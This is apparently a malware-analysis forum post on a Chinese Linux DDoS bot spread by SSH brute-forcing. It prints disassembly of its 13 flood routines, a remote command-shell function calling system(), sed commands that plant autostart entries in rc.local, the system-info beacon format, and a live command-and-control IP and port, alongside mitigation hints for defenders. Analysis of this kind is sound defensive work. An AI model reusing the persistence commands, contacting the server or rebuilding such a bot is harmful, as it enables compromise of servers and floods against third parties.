The malware is not Elknot, IptabLesx or
Billgates, is using AES to decrypt the target & CNC data, and
contains 13 flooders (they added these one by one..so the next variant
maybe more..). Originated from China, with the spreading method via ssh
hacking. The malware firstly spotted few times in mid 2014. This sample
is not the first sample/new one.
This sample was served in the panel below, noted: just being released sample:
Some notes:
Flood mitigation can be applied to filter this specific header: (reff: .rodata:0x080ED38F && .rodata:0x080ED474)
This sample was served in the panel below, noted: just being released sample:
Some notes:
Flood mitigation can be applied to filter this specific header: (reff: .rodata:0x080ED38F && .rodata:0x080ED474)
Code: Select all
Autostart installation:
Accept-Language: zh-cn
Accept-Language: zh-CN
Code: Select all
Source files (unstripped)
sed -i -e '/%s/d' /etc/rc.local
sed -i -e '2 i%s/%s' /etc/rc.local
sed -i -e '2 i%s/%s start' /etc/rc.d/rc.local
sed -i -e '2 i%s/%s start' /etc/init.d/boot.local
Code: Select all
Some PoC of AES:
File : 'crtstuff.c'
File : 'AES.cpp'
File : 'main.cpp'
File : 'eh_personality.cc'
File : 'eh_alloc.cc'
File : 'eh_exception.cc'
File : 'eh_call.cc'
File : 'pure.cc'
File : 'eh_globals.cc'
File : 'del_op.cc'
File : 'eh_catch.cc'
File : 'class_type_info.cc'
File : 'allocator-inst.cc'
File : 'string-inst.cc'
File : 'eh_terminate.cc'
File : 'eh_term_handler.cc'
File : 'si_class_type_info.cc'
File : 'eh_throw.cc'
File : 'eh_unex_handler.cc'
File : 'vterminate.cc'
File : 'tinfo.cc'
File : 'new_op.cc'
File : 'eh_type.cc'
File : 'cp-demangle.c'
File : 'functexcept.cc'
File : 'regex.cc'
File : 'system_error.cc'
File : 'functional.cc'
File : 'future.cc'
File : 'new_handler.cc'
File : 'bad_typeid.cc'
File : 'bad_alloc.cc'
File : 'eh_ptr.cc'
File : 'guard.cc'
File : 'guard_error.cc'
File : 'bad_cast.cc'
File : 'ios_failure.cc'
File : 'stdexcept.cc'
File : 'condition_variable.cc'
File : 'mutex.cc'
File : 'thread.cc'
File : 'unwind-dw2.c'
File : 'unwind-dw2-fde-dip.c'
File : 'libgcc2.c'
File : 'unwind-c.c'
Code: Select all
DDoS' (13 of them) functions: SYN_Flood, LSYN_Flood, UDP_Flood,
TCP_Flood, DNS_Flood1, DNS_Flood2, DNS_Flood3, DNS_Flood4, CC_Flood,
CC2_Flood, CC3_Flood, UDPS_Flood, UDP_Flood
.text:0804832C ; AES::AES(unsigned char *)
.text:0804832C public _ZN3AESC2EPh
;;
.text:0804883E ; AES::KeyExpansion(unsigned char *, unsigned char (*)[4][4])
.text:0804883E public _ZN3AES12KeyExpansionEPhPA4_A4_h
;;
Code: Select all
System command interface for execution.. this is bad...hacked server can be used as RAT
;; DDOS 1
0x0804EE62:
mov eax, [ebp+arg_0]
mov eax, [eax+18Ch]
cmp eax, 28h
jg short 0x0804EE9D
mov eax, [ebp+var_C]
shl eax, 2
lea edx, id[eax]
mov eax, [ebp+arg_0]
mov [esp+0Ch], eax
mov dword ptr [esp+8], offset _Z9SYN_FloodPv ; SYN_Flood(void *)
mov dword ptr [esp+4], 0
mov [esp], edx
call pthread_create
jmp short 0x0804EEC8
;; DDOS 2
0x0804EE9D:
mov eax, [ebp+var_C]
shl eax, 2
lea edx, id[eax]
mov eax, [ebp+arg_0]
mov [esp+0Ch], eax
mov dword ptr [esp+8], offset _Z10LSYN_FloodPv ; LSYN_Flood(void *)
mov dword ptr [esp+4], 0
mov [esp], edx
call pthread_create
;; DDOS 3
0x0804EEED:
mov eax, [ebp+var_C]
shl eax, 2
lea edx, id[eax]
mov eax, [ebp+arg_0]
mov [esp+0Ch], eax
mov dword ptr [esp+8], offset _Z9UDP_FloodPv ; UDP_Flood(void *)
mov dword ptr [esp+4], 0
mov [esp], edx
call pthread_create
add [ebp+var_C], 1
;; DDOS 4
0x0804EF3D:
mov eax, [ebp+var_C]
shl eax, 2
lea edx, id[eax]
mov eax, [ebp+arg_0]
mov [esp+0Ch], eax
mov dword ptr [esp+8], offset _Z9TCP_FloodPv ; TCP_Flood(void *)
mov dword ptr [esp+4], 0
mov [esp], edx
call pthread_create
add [ebp+var_C], 1
;; DDOS 5
0x0804EF8D:
mov eax, [ebp+var_C]
shl eax, 2
lea edx, id[eax]
mov eax, [ebp+arg_0]
mov [esp+0Ch], eax
mov dword ptr [esp+8], offset _Z10DNS_Flood1Pv ; DNS_Flood1(void *)
mov dword ptr [esp+4], 0
mov [esp], edx
call pthread_create
add [ebp+var_C], 1
;; DDOS 6
0x0804EFDD:
mov eax, [ebp+var_C]
shl eax, 2
lea edx, id[eax]
mov eax, [ebp+arg_0]
mov [esp+0Ch], eax
mov dword ptr [esp+8], offset _Z10DNS_Flood2Pv ; DNS_Flood2(void *)
mov dword ptr [esp+4], 0
mov [esp], edx
call pthread_create
add [ebp+var_C], 1
;; DDOS 7
0x0804F02D:
mov eax, [ebp+var_C]
shl eax, 2
lea edx, id[eax]
mov eax, [ebp+arg_0]
mov [esp+0Ch], eax
mov dword ptr [esp+8], offset _Z10DNS_Flood3Pv ; DNS_Flood3(void *)
mov dword ptr [esp+4], 0
mov [esp], edx
call pthread_create
add [ebp+var_C], 1
;; DDOS 8
0x0804F07D:
mov eax, [ebp+var_C]
shl eax, 2
lea edx, id[eax]
mov eax, [ebp+arg_0]
mov [esp+0Ch], eax
mov dword ptr [esp+8], offset _Z10DNS_Flood4Pv ; DNS_Flood4(void *)
mov dword ptr [esp+4], 0
mov [esp], edx
call pthread_create
add [ebp+var_C], 1
;; DDOS 9
0x0804F0CD:
mov eax, [ebp+var_C]
shl eax, 2
lea edx, id[eax]
mov eax, [ebp+arg_0]
mov [esp+0Ch], eax
mov dword ptr [esp+8], offset _Z8CC_FloodPv ; CC_Flood(void *)
mov dword ptr [esp+4], 0
mov [esp], edx
call pthread_create
add [ebp+var_C], 1
;; DDOS 10
0x0804F11D:
mov eax, [ebp+var_C]
shl eax, 2
lea edx, id[eax]
mov eax, [ebp+arg_0]
mov [esp+0Ch], eax
mov dword ptr [esp+8], offset _Z9CC2_FloodPv ; CC2_Flood(void *)
mov dword ptr [esp+4], 0
mov [esp], edx
call pthread_create
add [ebp+var_C], 1
;; DDOS 11
0x0804F16D:
mov eax, [ebp+var_C]
shl eax, 2
lea edx, id[eax]
mov eax, [ebp+arg_0]
mov [esp+0Ch], eax
mov dword ptr [esp+8], offset _Z9CC3_FloodPv ; CC3_Flood(void *)
mov dword ptr [esp+4], 0
mov [esp], edx
call pthread_create
add [ebp+var_C], 1
;; DDOS 12
0x0804F1BD:
mov eax, [ebp+var_C]
shl eax, 2
lea edx, id[eax]
mov eax, [ebp+arg_0]
mov [esp+0Ch], eax
mov dword ptr [esp+8], offset _Z10UDPS_FloodPv ; UDPS_Flood(void *)
mov dword ptr [esp+4], 0
mov [esp], edx
call pthread_create
add [ebp+var_C], 1
;; DDOS 13
0x0804F20A:
mov eax, [ebp+var_C]
shl eax, 2
lea edx, id[eax]
mov eax, [ebp+arg_0]
mov [esp+0Ch], eax
mov dword ptr [esp+8], offset _Z9UDP_FloodPv ; UDP_Flood(void *)
mov dword ptr [esp+4], 0
mov [esp], edx
call pthread_create
add [ebp+var_C], 1
Code: Select all
We can expect CPU info with below format will be sent to remote:
.text:0x0804E6C2 ; Cmdshell(_MSGHEAD *)
.text:0x0804E6C2 public _Z8CmdshellP8_MSGHEAD
.text:0x0804E6C2 _Z8CmdshellP8_MSGHEAD proc near
.text:0x0804E6C2
.text:0x0804E6C2 arg_0= dword ptr 8
.text:0x0804E6C2
.text:0x0804E6C2 push ebp
.text:0x0804E6C3 mov ebp, esp
.text:0x0804E6C5 sub esp, 18h
.text:0x0804E6C8 mov eax, [ebp+arg_0]
.text:0x0804E6CB add eax, 100h
.text:0x0804E6D0 mov [esp], eax
.text:0x0804E6D3 call system
.text:0x0804E6D8 leave
.text:0x0804E6D9 retn
.text:0x0804E6D9 _Z8CmdshellP8_MSGHEAD endp
.text:0x0804E6D9
Code: Select all
CNC:
:`
.text:0x080509E2 lea eax, [ebp+var_1110]
.text:0x080509E8 add eax, 68h
.text:0x080509EB mov [esp+4], eax
.text:0x080509EF lea eax, [ebp+var_1110]
.text:0x080509F5 add eax, 64h
.text:0x080509F8 mov [esp], eax
.text:0x080509FB call _Z10GetCpuInfoPjS_ ; GetCpuInfo(uint *,uint *)
.text:0x08050A00 lea eax, [ebp+var_11D0]
.text:0x08050A06 mov [esp], eax
.text:0x08050A09 call sysinfo
.text:0x08050A0E mov [ebp+var_24], eax
.text:0x08050A11 mov eax, [ebp+var_11C0]
.text:0x08050A17 shr eax, 14h
.text:0x08050A1A mov [ebp+var_10A4], eax
.text:0x08050A20 mov edx, [ebp+var_11C0]
.text:0x08050A26 mov eax, [ebp+var_11BC]
.text:0x08050A2C mov ecx, edx
.text:0x08050A2E sub ecx, eax
.text:0x08050A30 mov eax, ecx
.text:0x08050A32 shr eax, 14h
.text:0x08050A35 mov [ebp+var_10A0], eax
.text:0x08050A3B lea ebx, [ebp+var_43C]
.text:0x08050A41 mov eax, 0
.text:0x08050A46 mov edx, 100h
.text:0x08050A4B mov edi, ebx
.text:0x08050A4D mov ecx, edx
.text:0x08050A4F rep stosd
.text:0x08050A51 mov ebx, [ebp+var_10A0]
.text:0x08050A57 mov ecx, [ebp+var_10A4]
.text:0x08050A5D mov edx, [ebp+var_10A8]
.text:0x08050A63 mov eax, [ebp+var_10AC]
.text:0x08050A69 mov dword ptr [esp+20h], offset aHacker ; "Hacker"
.text:0x08050A71 mov [esp+1Ch], ebx
.text:0x08050A75 mov [esp+18h], ecx
.text:0x08050A79 mov [esp+14h], edx
.text:0x08050A7D mov [esp+10h], eax
.text:0x08050A81 lea eax, [ebp+var_1110]
.text:0x08050A87 mov [esp+0Ch], eax
.text:0x08050A8B mov dword ptr [esp+8], offset aVersonexLinuxS ; "VERSONEX:Linux-%s|%d|%d MHz|%dMB|%dMB|%"...
.text:0x08050A93 mov dword ptr [esp+4], 400h
.text:0x08050A9B lea eax, [ebp+var_43C]
.text:0x08050AA1 mov [esp], eax
.text:0x08050AA4 call snprintf
.text:0x08050AA9 mov eax, ds:MainSocket
.text:0x08050AAE test eax, eax
Code: Select all
sin_port=htons(48080), sin_addr=inet_addr("119.147.145.215")
Loc:
119.147.145.215||4134 | 119.144.0.0/14 | CHINANET | CN | CHINATELECOM.COM.CN | CHINANET GUANGDONG PROVINCE NETWORK
Attachments
7z,pwd:infected
(639.49 KiB) Downloaded 159 times
(639.49 KiB) Downloaded 159 times